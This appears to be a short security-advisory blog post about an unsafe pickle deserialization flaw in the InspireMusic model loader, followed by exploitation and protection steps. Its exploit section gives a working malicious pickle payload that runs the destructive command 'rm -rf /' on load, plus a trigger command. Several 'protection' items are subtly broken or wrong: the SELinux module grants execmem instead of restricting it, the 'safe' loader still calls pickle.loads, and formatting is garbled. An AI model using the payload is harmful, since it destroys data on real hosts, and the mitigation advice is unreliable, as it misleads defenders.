How the CVE Works
The vulnerability (CVE-2025-XXXXX) in FunAudioLLM InspireMusic stems from unsafe deserialization in the `load_state_dict` function within inspiremusic/cli/model.py. Attackers can craft malicious pickle files that, when loaded, execute arbitrary code during deserialization. Since the application uses Python’s `pickle` module without proper validation, deserializing untrusted data leads to remote code execution (RCE). The exploit requires local access but can escalate privileges or compromise the host if combined with other attack vectors.

What Undercode Say:
Exploitation
1. Malicious Pickle Payload
import pickle
import os
class Exploit:
def <strong>reduce</strong>(self):
return (os.system, ('rm -rf /',))
payload = pickle.dumps(Exploit())
with open('malicious.pkl', 'wb') as f:
f.write(payload)
2. Triggering the Vulnerability
python3 inspiremusic/cli/model.py --load malicious.pkl
Protection
1. Patch Application
git apply https://github.com/FunAudioLLM/InspireMusic/commit/784cbf8dde2cf1456ff808aeba23177e1810e7a9.patch
2. Input Validation
import pickle
import hashlib
def safe_load(file):
if not file.endswith('.pkl'):
raise ValueError("Invalid file format")
with open(file, 'rb') as f:
data = f.read()
if hashlib.sha256(data).hexdigest() != TRUSTED_HASH:
raise ValueError("Untrusted file")
return pickle.loads(data)
3. Mitigation Commands
Restrict file permissions chmod 600 /path/to/models/.pkl Monitor deserialization auditctl -a always,exit -F arch=b64 -S open -F path=.pkl
4. Log Analysis
grep "pickle.load" /var/log/inspiremusic.log | awk '{print $1, $6}'
5. Network Isolation
iptables -A INPUT -p tcp --dport 5000 -j DROP
6. Alternative Libraries
import json def safe_serialize(data): return json.dumps(data)
7. SELinux Policy
cat <<EOF > inspmusic_selinux.te
module inspmusic 1.0;
require { type unconfined_t; }
allow unconfined_t self:process execmem;
EOF
8. Exploit Detection
import re def is_malicious(file): with open(file, 'rb') as f: return bool(re.search(b'<strong>reduce</strong>', f.read()))
9. Patch Verification
git verify-commit 784cbf8dde2cf1456ff808aeba23177e1810e7a9
